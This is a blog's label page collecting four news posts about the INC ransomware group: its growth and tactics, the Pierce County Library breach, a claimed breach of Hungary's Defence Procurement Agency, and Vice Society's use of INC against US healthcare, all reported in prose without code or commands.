Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label Inc ransomware. Show all posts
spear phishing
BYOVD Attack Inc ransomware LockBit malware Ransomware spear phishing

INC Ransomware Climbs Into Top Tier of Cybercrime Operations, Surpasses 830 Victims

 



The ransomware operation known as INC has grown into one of the most active cybercrime groups of 2026, with security researchers linking it to more than 830 victims since it first appeared in August 2023.

According to researchers at Acronis, the group's rise coincided with disruptions affecting major ransomware brands such as LockBit and BlackCat. As affiliates sought alternative platforms, INC appears to have benefited from that shift. More than 65% of the victims listed by the group are based in the United States, with legal firms, healthcare providers, manufacturers, construction companies, and technology organizations among the most frequently targeted sectors.

Researchers also observed major changes to the ransomware itself. INC's malware for Windows and Linux/VMware ESXi systems has been rewritten in Rust, a programming language increasingly adopted by malware developers because it supports multiple operating systems and can complicate reverse-engineering efforts.

The group's toolkit has expanded as well. Recent attacks have involved a credential-stealing utility capable of extracting authentication data from newer Veeam backup deployments that use salted DPAPI encryption. Access to backup infrastructure can give attackers valuable credentials while also making recovery efforts more difficult for victims.

Acronis noted that the sale of INC's Windows and Linux ransomware variants on underground cybercrime forums in May 2024 contributed to the appearance of related ransomware families, including Lynx and Sinobi. Researchers identified significant code similarities between the groups.

Investigators found that INC affiliates rely on several entry points to compromise networks, including spear-phishing campaigns, credentials purchased from Initial Access Brokers (IABs), and the exploitation of publicly exposed systems running vulnerable versions of Citrix NetScaler, Fortinet EMS, and SimpleHelp software.

Once inside a network, attackers harvest credentials, move between systems using legitimate administrative tools such as RDP and PsExec, and attempt to weaken security controls through a technique known as Bring Your Own Vulnerable Driver (BYOVD). Researchers observed the use of vulnerable drivers including filwfp.sys, filnk.sys, and fildds.sys. The group also deploys tools such as Cobalt Strike, AnyDesk, ScreenConnect, and TeamViewer to maintain access and control compromised environments.

Before encryption begins, stolen files are collected and transferred using Rclone, often after being packaged into password-protected archives. The ransomware then encrypts systems using multithreading and partial-encryption techniques to speed up the process. When launched against VMware ESXi environments, the malware can also attempt to shut down virtual machines.

Data from ZeroFox ranked INC as the fourth most active ransomware operation during the first quarter of 2026, recording more than 120 incidents. Researchers said the group's growth demonstrates how ransomware operators can build large-scale campaigns using widely available tools, stolen credentials, and unpatched systems rather than relying on highly specialized malware.

Read more »
Personal Data Breach
Cyberattacks Data Breach Data breaches attacks Data Leak data security INC Ransom gang Inc ransomware Library Personal Data Breach

Pierce County Library System Data Breach Exposes Information of Over 340,000 People

 

A cyber attack on the Pierce County Library System in the state of Washington has led to the compromise of personal data of over 340,000 people, which is indicative of the rising threat of cybersecurity breaches being posed to public services. This attack has impacted library services in the entire county, along with library users and staff. The incident was made known to the public through breach notification letters published on the website of the Pierce County Library System. 

The incident, as revealed in the notification letters, occurred when the library system detected the incident on April 21 and decided to shut all library systems in an effort to control the breach. The library system conducted an investigation that confirmed the breach had taken place. 

The library network was also able to identify that the exfiltration of data from individuals who utilized or were part of the institution was successful on May 12. It was established that the hackers had access to the network from April 15 to April 21. Access to sensitive information was gained and exfiltrated during this time. The level of information that was vulnerable varied depending on who was targeted. 

The data that was breached for the benefit of the library patrons included names and dates of birth. Though very limited compared to the data for employees, this data is still significant for use in identity-related fraud. The breach had severe implications for current and former employees who worked within the library system. The data that was stolen for them included Social Security numbers, financial accounts, driver’s license numbers, credit card numbers, passports, health insurance, and certain data related to medical matters. 

This particular ransomware assault would later be attributed to the INC ransomware gang, which has been responsible for a number of highly detrimental attacks on government bodies over 2025. The gang has previously conducted attacks on bodies such as the Office of the Attorney General of Pennsylvania and a countrywide emergency alert service used by local authority bodies. This type of situation is not the first that has occurred on the level of Pierce County. 

In the year 2023, Pierce County was the victim of a ransomware attack on the public transit service that the community utilized heavily because the service was used by 18,000 riders on a daily basis. Public library networks have become a common target for ransomware attacks in recent years. This is because cybercriminals also perceive public libraries as high-stakes targets since community members depend on them for internet access to their catalogs and other digital services, creating a challenge where an organization may feel pressured into paying a ransom demand to resume operations. Such attacks also include national and city library networks in North America. 

The current threat environment has led to calls for developing targeted programs within the government in the United States that would evaluate risks for libraries' cybersecurity environments. This involves enhancing data sharing related to cyber attacks and providing libraries with more support and advanced services from firewalls that target libraries specifically. 

The increasing digitization efforts by libraries as government institutions further solidify that a breach such as that which Pierce County experienced is a reminder that a continued investment in cybersecurity measures is a necessity.
Read more »
Ransomwares
Cyber Attacks Defense Hacker attack Inc ransomware IT Systems IT systems breach Military Data NATO Ransomwares

Hungarian Defence Agency Hacked: Foreign Hackers Breach IT Systems

 

Foreign hackers recently infiltrated the IT systems of Hungary’s Defence Procurement Agency, a government body responsible for managing the country’s military acquisitions. According to Gergely Gulyas, the chief of staff to Hungarian Prime Minister Viktor Orban, no sensitive military data related to Hungary’s national security or its military structure was compromised during the breach. Speaking at a press briefing, Gulyas confirmed that while some plans and procurement data may have been accessed, nothing that could significantly harm Hungary’s security was made public. The attackers, described as a “hostile foreign, non-state hacker group,” have not been officially identified by name. 

However, Hungarian news outlet Magyar Hang reported that a group known as INC Ransomware claimed responsibility for the breach. According to the outlet, the group accessed, encrypted, and reportedly published some files online, along with screenshots to demonstrate their access. The Hungarian government has refrained from confirming these details, citing an ongoing investigation to assess the breach’s scope and potential impact fully. Hungary, a NATO member state sharing a border with Ukraine, has been increasing its military investments since 2017 under a modernization and rearmament initiative. 

This program has seen the purchase of tanks, helicopters, air defense systems, and the establishment of a domestic military manufacturing industry. Among the notable projects is the production of Lynx infantry fighting vehicles by Germany’s Rheinmetall in Zalaegerszeg, a region in western Hungary. The ongoing conflict in Ukraine, which began with Russia’s 2022 invasion, has further driven Hungary to increase its defense spending. The government recently announced plans to allocate at least 2% of its GDP to military expenditures in 2024. Gulyas assured reporters that Hungary’s most critical military data remains secure. 

The Defence Procurement Agency itself does not handle sensitive information related to military operations or structural details, limiting the potential impact of the breach. The investigation aims to clarify whether the compromised files include any material that could pose broader risks to the nation’s defense strategy. The breach raises concerns about the cybersecurity measures protecting Hungary’s defense systems, particularly given the escalating reliance on advanced technology in modern military infrastructure. With ransomware attacks becoming increasingly sophisticated, governments and agencies globally are facing heightened pressure to bolster their cybersecurity defenses. 

Hungary’s response to this incident will likely involve a combination of intensified cybersecurity protocols and ongoing collaboration with NATO allies to mitigate similar threats in the future. As the investigation continues, the government is expected to release further updates about the breach’s scope and any additional preventive measures being implemented.
Read more »
Vice Society
American healthcare cyberattack Cyber Security Inc ransomware ransomware-as-a-service Vice Society

Vice Society Shifts to Inc Ransomware in Latest Healthcare Cyberattack

 

Ransomware incidents are increasing, with a recent attack targeting American healthcare institutions by a well-known cybercrime group.

Vice Society, also known as Vanilla Tempest by Microsoft, has been active since July 2022. This Russian-speaking group has utilized various ransomware strains in its double extortion tactics, including BlackCat, Hello Kitty, Quantum Locker, Rhysida, Zeppelin (including a custom version), and its own proprietary ransomware.

In a series of updates on X, the Microsoft Threat Intelligence Center (MSTIC) highlighted the group's latest weapon: Inc ransomware.

"Vanilla Tempest is one of the most active ransomware operators that MSTIC monitors," said Jeremy Dallman, MSTIC's senior director of threat intelligence. "While they have been targeting healthcare for some time, their recent adoption of the Inc ransomware payload marks a significant shift as they increasingly engage with the broader ransomware-as-a-service (RaaS) ecosystem."

Although Vice Society targets multiple industries, including IT and manufacturing, it is primarily known for its campaigns against education and healthcare. This aligns with broader cybersecurity trends. According to Check Point Research, healthcare remains the most frequently targeted sector by ransomware. In fact, healthcare organizations worldwide face an average of 2,018 attacks per week, representing a 32% increase compared to the previous year.

Cindi Carter, Check Point's CISO for the Americas, explains the appeal to cybercriminals. "Healthcare organizations are often plagued by outdated legacy technology and bureaucratic hurdles, making them easy targets. Additionally, the data these organizations collect is highly valuable," she states. "A medical record is one of the most identifiable pieces of digital information about a person, second only to a fingerprint."

In its recent healthcare exploits, Vice Society gained initial access through systems already compromised by the Gootloader backdoor. The group subsequently deployed tools such as the Supper backdoor, AnyDesk’s remote monitoring software, and MEGA’s data synchronization service—both legitimate products. They utilized Remote Desktop Protocol (RDP) for lateral movement and exploited Windows Management Instrumentation (WMI) to drop Inc ransomware within infected networks.

Inc ransomware has been operational since last summer, making headlines for attacking large organizations, including Xerox and Scotland's National Health Service (NHS). Jason Baker, a threat intelligence consultant with GuidePoint Security, notes that the organized nature of Inc ransomware affiliates sets them apart.

"The most distinct aspect of Inc affiliates is their systematic approach during the negotiation process," Baker says, drawing from his own experiences. "They don’t make off-the-cuff remarks or resort to empty threats. Everything is methodical."

Baker likens it to the difference between a well-planned bank robbery and a spontaneous street mugging. "You can tell when someone has put serious thought into their attack and knows exactly what they're doing," he adds.

According to a report from Dark Reading, Inc’s malware recently leaked details about its encryption methods, potentially giving defenders an advantage. However, Baker warns that the reality is far more nuanced, especially in the healthcare sector.

"If an organization realizes it can recover data without needing a decryptor, it reduces their incentive to pay the ransom," he explains. "But the situation becomes more complex in double extortion scenarios, especially when sensitive personally identifiable health information (PHI) or intellectual property is involved. That’s why double extortion remains effective—it adds pressure, even if recovery is possible."
Read more »
Subscribe to: Posts (Atom)